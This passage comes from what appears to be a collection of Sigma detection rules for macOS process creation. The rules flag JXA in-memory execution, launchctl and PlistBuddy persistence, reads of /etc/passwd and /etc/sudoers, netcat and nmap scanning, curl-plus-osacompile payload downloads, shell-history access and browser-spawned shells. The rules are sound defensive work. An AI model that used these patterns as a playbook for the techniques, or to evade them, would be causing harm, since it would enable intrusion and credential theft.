    "path": "rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml",
    "content": "title: JXA In-memory Execution Via OSAScript\nid: f1408a58-0e94-4165-b80a-da9f96cf6fc3\nrelated:\n    - id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55\n      type: derived\nstatus: test\ndescription: Detects possible malicious execution of JXA in-memory via OSAScript\nreferences:\n    - https://redcanary.com/blog/applescript/\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-01-31\ntags:\n    - attack.t1059.002\n    - attack.t1059.007\n    - attack.execution\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_main:\n        CommandLine|contains|all:\n            - 'osascript'\n            - ' -e '\n            - 'eval'\n            - 'NSData.dataWithContentsOfURL'\n    selection_js:\n        - CommandLine|contains|all:\n              - ' -l '\n              - 'JavaScript'\n        - CommandLine|contains: '.js'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_launchctl_execution.yml",
    "content": "title: Launch Agent/Daemon Execution Via Launchctl\nid: ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e\nstatus: test\ndescription: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md\n    - https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/\n    - https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\n    - https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html\n    - https://www.loobins.io/binaries/launchctl/\nauthor: Pratinav Chandra\ndate: 2024-05-13\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1569.001\n    - attack.t1543.001\n    - attack.t1543.004\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/launchctl'\n        CommandLine|contains:\n            - 'submit'\n            - 'load'\n            - 'start'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities are expected to trigger false positives. Investigate the command line being passed to determine whether the service or launch agent is suspicious.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_local_account.yml",
    "content": "title: Local System Accounts Discovery - MacOs\nid: ddf36b67-e872-4507-ab2e-46bda21b842c\nstatus: test\ndescription: Detects enumeration of local system accounts on MacOS\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-08\nmodified: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1087.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith: '/dscl'\n        CommandLine|contains|all:\n            - 'list'\n            - '/users'\n    selection_2:\n        Image|endswith: '/dscacheutil'\n        CommandLine|contains|all:\n            - '-q'\n            - 'user'\n    selection_3:\n        CommandLine|contains: '''x:0:'''\n    selection_4:\n        Image|endswith: '/cat'\n        CommandLine|contains:\n            - '/etc/passwd'\n            - '/etc/sudoers'\n    selection_5:\n        Image|endswith: '/id'\n    selection_6:\n        Image|endswith: '/lsof'\n        CommandLine|contains: '-u'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_local_groups.yml",
    "content": "title: Local Groups Discovery - MacOs\nid: 89bb1f97-c7b9-40e8-b52b-7d6afbd67276\nstatus: test\ndescription: Detects enumeration of local system groups\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: Ömer Günal, Alejandro Ortuno, oscd.community\ndate: 2020-10-11\nmodified: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith: '/dscacheutil'\n        CommandLine|contains|all:\n            - '-q'\n            - 'group'\n    selection_2:\n        Image|endswith: '/cat'\n        CommandLine|contains: '/etc/group'\n    selection_3:\n        Image|endswith: '/dscl'\n        CommandLine|contains|all:\n            - '-list'\n            - '/groups'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml",
    "content": "title: MacOS Network Service Scanning\nid: 84bae5d4-b518-4ae0-b331-6d4afd34d00f\nstatus: test\ndescription: Detects enumeration of local or remote network services.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-21\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith:\n            - '/nc'\n            - '/netcat'\n    selection_2:\n        Image|endswith:\n            - '/nmap'\n            - '/telnet'\n    filter:\n        CommandLine|contains: 'l'\n    condition: (selection_1 and not filter) or selection_2\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_network_sniffing.yml",
    "content": "title: Network Sniffing - MacOs\nid: adc9bcc4-c39c-4f6b-a711-1884017bf043\nstatus: test\ndescription: |\n  Detects the usage of tooling to sniff network traffic.\n  An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-14\nmodified: 2022-11-26\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith:\n            - '/tcpdump'\n            - '/tshark'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml",
    "content": "title: File Download Via Nscurl - MacOS\nid: 6d8a7cf1-8085-423b-b87d-7e880faabbdf\nstatus: test\ndescription: Detects the execution of the nscurl utility in order to download files.\nreferences:\n    - https://www.loobins.io/binaries/nscurl/\n    - https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl\n    - https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd\nauthor: Daniel Cortez\ndate: 2024-06-04\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/nscurl'\n        CommandLine|contains:\n            - '--download '\n            - '--download-directory '\n            - '--output '\n            - '-dir '\n            - '-dl '\n            - '-ld'\n            - '-o '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of nscurl by administrators and users.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml",
    "content": "title: Suspicious Microsoft Office Child Process - MacOS\nid: 69483748-1525-4a6c-95ca-90dc8d431b68\nstatus: test\ndescription: Detects suspicious child processes spawned from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution\nreferences:\n    - https://redcanary.com/blog/applescript/\n    - https://objective-see.org/blog/blog_0x4B.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-01-31\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.t1059.002\n    - attack.t1137.002\n    - attack.t1204.002\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|contains:\n            - 'Microsoft Word'\n            - 'Microsoft Excel'\n            - 'Microsoft PowerPoint'\n            - 'Microsoft OneNote'\n        Image|endswith:\n            - '/bash'\n            - '/curl'\n            - '/dash'\n            - '/fish'\n            - '/osacompile'\n            - '/osascript'\n            - '/sh'\n            - '/zsh'\n            - '/python'\n            - '/python3'\n            - '/wget'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml",
    "content": "title: OSACompile Run-Only Execution\nid: b9d9b652-d8ed-4697-89a2-a1186ee680ac\nstatus: test\ndescription: Detects potentially suspicious run-only executions compiled using OSACompile\nreferences:\n    - https://redcanary.com/blog/applescript/\n    - https://ss64.com/osx/osacompile.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-01-31\ntags:\n    - attack.t1059.002\n    - attack.execution\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'osacompile'\n            - ' -x '\n            - ' -e '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml",
    "content": "title: Payload Decoded and Decrypted via Built-in Utilities\nid: 234dc5df-40b5-49d1-bf53-0d44ce778eca\nstatus: test\ndescription: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823\nauthor: Tim Rauch (rule), Elastic (idea)\ndate: 2022-10-17\ntags:\n    - attack.t1059\n    - attack.t1204\n    - attack.execution\n    - attack.t1140\n    - attack.defense-evasion\n    - attack.s0482\n    - attack.s0402\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/openssl'\n        CommandLine|contains|all:\n            - '/Volumes/'\n            - 'enc'\n            - '-base64'\n            - ' -d '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml",
    "content": "title: Potential Persistence Via PlistBuddy\nid: 65d506d3-fcfe-4071-b4b2-bcefe721bbbb\nstatus: test\ndescription: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility\nreferences:\n    - https://redcanary.com/blog/clipping-silver-sparrows-wings/\n    - https://www.manpagez.com/man/8/PlistBuddy/\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-02-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.001\n    - attack.t1543.004\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/PlistBuddy'\n        CommandLine|contains|all:\n            - 'RunAtLoad'\n            - 'true'\n        CommandLine|contains:\n            - 'LaunchAgents'\n            - 'LaunchDaemons'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_meshagent_arguments.yml",
    "content": "title: Remote Access Tool - Potential MeshAgent Execution - MacOS\nid: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9\nrelated:\n    - id: 2fbbe9ff-0afc-470b-bdc0-592198339968\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential execution of MeshAgent which is a tool used for remote access.\n    Historical data shows that threat actors rename MeshAgent binary to evade detection.\n    Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.\nreferences:\n    - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n    - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\n    - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n    - https://www.security.com/threat-intelligence/medusa-ransomware-attacks\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-05-19\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        CommandLine|contains: '--meshServiceName'\n    condition: selection\nfalsepositives:\n    - Environments that legitimately use MeshAgent\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_renamed_meshagent_execution.yml",
    "content": "title: Remote Access Tool - Renamed MeshAgent Execution - MacOS\nid: bd3b5eaa-439d-4a42-8f35-a49f5c8a2582\nrelated:\n    - id: b471f462-eb0d-4832-be35-28d94bdb4780\n      type: similar\n    - id: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9\n      type: derived\nstatus: experimental\ndescription: |\n    Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.\n    RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.\n    However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.\nreferences:\n    - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n    - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\n    - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n    - https://www.security.com/threat-intelligence/medusa-ransomware-attacks\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-05-19\ntags:\n    - attack.command-and-control\n    - attack.defense-evasion\n    - attack.t1219.002\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_meshagent:\n        - CommandLine|contains: '--meshServiceName'\n        - OriginalFileName|contains: 'meshagent'\n    filter_main_legitimate:\n        Image|endswith:\n            - '/meshagent'\n            - '/meshagent_osx64'\n    condition: selection_meshagent and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml",
    "content": "title: Remote Access Tool - Team Viewer Session Started On MacOS Host\nid: f459ccb4-9805-41ea-b5b2-55e279e2424a\nrelated:\n    - id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357\n      type: similar\n    - id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d\n      type: similar\nstatus: test\ndescription: |\n    Detects the command line executed when TeamViewer starts a session initiated by a remote host.\n    Once a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\nreferences:\n    - Internal Research\nauthor: Josh Nickels, Qi Nan\ndate: 2024-03-11\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        ParentImage|endswith: '/TeamViewer_Service'\n        Image|endswith: '/TeamViewer_Desktop'\n        CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of TeamViewer\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml",
    "content": "title: Macos Remote System Discovery\nid: 10227522-8429-47e6-a301-f2b2d014e7ad\nstatus: test\ndescription: Detects the enumeration of other remote systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-22\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith: '/arp'\n        CommandLine|contains: '-a'\n    selection_2:\n        Image|endswith: '/ping'\n        CommandLine|contains:\n            - ' 10.' # 10.0.0.0/8\n            - ' 192.168.' # 192.168.0.0/16\n            - ' 172.16.' # 172.16.0.0/12\n            - ' 172.17.'\n            - ' 172.18.'\n            - ' 172.19.'\n            - ' 172.20.'\n            - ' 172.21.'\n            - ' 172.22.'\n            - ' 172.23.'\n            - ' 172.24.'\n            - ' 172.25.'\n            - ' 172.26.'\n            - ' 172.27.'\n            - ' 172.28.'\n            - ' 172.29.'\n            - ' 172.30.'\n            - ' 172.31.'\n            - ' 127.' # 127.0.0.0/8\n            - ' 169.254.' # 169.254.0.0/16\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml",
    "content": "title: Scheduled Cron Task/Job - MacOs\nid: 7c3b43d8-d794-47d2-800a-d277715aa460\nstatus: test\ndescription: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-06\nmodified: 2022-11-27\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/crontab'\n        CommandLine|contains: '/tmp/'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_screencapture.yml",
    "content": "title: Screen Capture - macOS\nid: 0877ed01-da46-4c49-8476-d49cdd80dfa7\nstatus: test\ndescription: Detects attempts to use screencapture to collect macOS screenshots\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md\n    - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py\nauthor: remotephone, oscd.community\ndate: 2020-10-13\nmodified: 2021-11-27\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image: '/usr/sbin/screencapture'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity taking screenshots\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml",
    "content": "title: Security Software Discovery - MacOs\nid: 0ed75b9c-c73b-424d-9e7d-496cd565fbe0\nstatus: test\ndescription: Detects usage of system utilities (only grep for now) to discover security software\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    image:\n        Image: '/usr/bin/grep'\n    selection_cli_1:\n        CommandLine|contains:\n            - 'nessusd'        # nessus vulnerability scanner\n            - 'santad'         # google santa\n            - 'CbDefense'      # carbon black\n            - 'falcond'        # crowdstrike falcon\n            - 'td-agent'       # fluentd log shipper\n            - 'packetbeat'     # elastic network logger/shipper\n            - 'filebeat'       # elastic log file shipper\n            - 'auditbeat'      # elastic auditing agent/log shipper\n            - 'osqueryd'       # facebook osquery\n            - 'BlockBlock'     # Objective-See persistence locations watcher/blocker\n            - 'LuLu'           # Objective-See firewall management utility\n    selection_cli_2: # Objective Development Software firewall management utility\n        CommandLine|contains|all:\n            - 'Little'\n            - 'Snitch'\n    condition: image and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_space_after_filename.yml",
    "content": "title: Space After Filename - macOS\nid: b6e2a2e3-2d30-43b1-a4ea-071e36595690\nstatus: test\ndescription: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md\nauthor: remotephone\ndate: 2021-11-20\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.t1036.006\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection1:\n        CommandLine|endswith: ' '\n    selection2:\n        Image|endswith: ' '\n    condition: 1 of selection*\nfalsepositives:\n    - Mistyped commands or legitimate binaries named to match the pattern\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml",
    "content": "title: Split A File Into Pieces\nid: 7f2bb9d5-6395-4de5-969c-70c11fbe6b12\nstatus: test\ndescription: Detects use of the \"split\" command to split files into parts for possible transfer.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md\nauthor: 'Igor Fits, Mikhail Larin, oscd.community'\ndate: 2020-10-15\nmodified: 2021-11-27\ntags:\n    - attack.exfiltration\n    - attack.t1030\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/split'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml",
    "content": "title: Suspicious Browser Child Process - MacOS\nid: 0250638a-2b28-4541-86fc-ea4c558fa0c6\nstatus: test\ndescription: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.\nreferences:\n    - https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang\n    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-04-05\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1189\n    - attack.t1203\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        ParentImage|contains:\n            - 'com.apple.WebKit.WebContent'\n            - 'firefox'\n            - 'Google Chrome Helper'\n            - 'Google Chrome'\n            - 'Microsoft Edge'\n            - 'Opera'\n            - 'Safari'\n            - 'Tor Browser'\n        Image|endswith:\n            - '/bash'\n            - '/curl'\n            - '/dash'\n            - '/ksh'\n            - '/osascript'\n            - '/perl'\n            - '/php'\n            - '/pwsh'\n            - '/python'\n            - '/sh'\n            - '/tcsh'\n            - '/wget'\n            - '/zsh'\n    filter_main_generic:\n        CommandLine|contains: '--defaults-torrc' # Informs tor to use default config file\n    filter_main_ms_autoupdate:\n        CommandLine|contains: '/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate' # Microsoft AutoUpdate utility\n    filter_main_chrome:\n        ParentImage|contains:\n            - 'Google Chrome Helper'\n            - 'Google Chrome'\n        CommandLine|contains:\n            - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/*/Resources/install.sh' # Install the Google Chrome browser\n            - '/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/*/Resources/keystone_promote_preflight.sh' # Updates the Google Chrome branding configuration files\n            - '/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/*/Resources/keystone_promote_postflight.sh' # Script that performs the post-installation tasks\n    filter_main_ms_edge:\n        ParentImage|contains: 'Microsoft Edge'\n        CommandLine|contains:\n            - 'IOPlatformExpertDevice' # Retrieves the IOPlatformUUID (parent process - Microsoft Edge)\n            - 'hw.model' # Retrieves model name of the computer's hardware (parent process - Microsoft Edge)\n    filter_main_chromerecovery:\n        ParentImage|contains:\n            - 'Google Chrome Helper'\n            - 'Google Chrome'\n        CommandLine|contains|all:\n            - '/Users/'\n            - '/Library/Application Support/Google/Chrome/recovery/'\n            - '/ChromeRecovery'\n    filter_optional_null:\n        # Avoids alerting for the events which do not have command-line arguments\n        CommandLine: null\n    filter_optional_empty:\n        # Avoids alerting for the events which do not have command-line arguments\n        CommandLine: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate browser install, update and recovery scripts\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml",
    "content": "title: Suspicious Execution via macOS Script Editor\nid: 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4\nstatus: test\ndescription: Detects when the macOS Script Editor utility spawns an unusual child process.\nauthor: Tim Rauch (rule), Elastic (idea)\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685\n    - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\ndate: 2022-10-21\nmodified: 2022-12-28\nlogsource:\n    category: process_creation\n    product: macos\ntags:\n    - attack.t1566\n    - attack.t1566.002\n    - attack.initial-access\n    - attack.t1059\n    - attack.t1059.002\n    - attack.t1204\n    - attack.t1204.001\n    - attack.execution\n    - attack.persistence\n    - attack.t1553\n    - attack.defense-evasion\ndetection:\n    selection_parent:\n        ParentImage|endswith: '/Script Editor'\n    selection_img:\n        - Image|endswith:\n              - '/curl'\n              - '/bash'\n              - '/sh'\n              - '/zsh'\n              - '/dash'\n              - '/fish'\n              - '/osascript'\n              - '/mktemp'\n              - '/chmod'\n              - '/php'\n              - '/nohup'\n              - '/openssl'\n              - '/plutil'\n              - '/PlistBuddy'\n              - '/xattr'\n              - '/sqlite'\n              - '/funzip'\n              - '/popen'\n        - Image|contains:\n              - 'python'\n              - 'perl'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml",
    "content": "title: Potential Discovery Activity Using Find - MacOS\nid: 85de3a19-b675-4a51-bfc6-b11a5186c971\nrelated:\n    - id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf\n      type: similar\nstatus: test\ndescription: Detects usage of the \"find\" binary in a suspicious manner to perform discovery\nreferences:\n    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/find'\n        CommandLine|contains:\n            - '-perm -4000'\n            - '-perm -2000'\n            - '-perm 0777'\n            - '-perm -222'\n            - '-perm -o w'\n            - '-perm -o x'\n            - '-perm -u=s'\n            - '-perm -g=s'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml",
    "content": "title: Suspicious History File Operations\nid: 508a9374-ad52-4789-b568-fc358def2c65\nstatus: test\ndescription: Detects command line operations on shell history files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nauthor: 'Mikhail Larin, oscd.community'\ndate: 2020-10-17\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1552.003\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '.bash_history'\n            - '.zsh_history'\n            - '.zhistory'\n            - '.history'\n            - '.sh_history'\n            - 'fish_history'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\n    - Legitimate software cleaning history files\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml",
    "content": "title: Potential In-Memory Download And Compile Of Payloads\nid: 13db8d2e-7723-4c2c-93c1-a4d36994f7ef\nstatus: test\ndescription: Detects potential in-memory downloading and compiling of applets using curl and osacompile, as used by XCSSET malware\nreferences:\n    - https://redcanary.com/blog/mac-application-bundles/\nauthor: Sohan G (D4rkCiph3r), Red Canary (idea)\ndate: 2023-08-22\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1059.007\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'osacompile'\n            - 'curl'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml",
    "content": "title: Suspicious MacOS Firmware Activity\nid: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099\nstatus: test\ndescription: Detects when a user manipulates the Firmware Password on MacOS. NOTE - this command has been disabled on silicon-based Apple computers.\nreferences:\n    - https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml\n    - https://www.manpagez.com/man/8/firmwarepasswd/\n    - https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web\nauthor: Austin Songer @austinsonger\ndate: 2021-09-30\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection1:\n        Image: '/usr/sbin/firmwarepasswd'\n        CommandLine|contains:\n            - 'setpasswd'\n            - 'full'\n            - 'delete'\n            - 'check'\n    condition: selection1\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml",
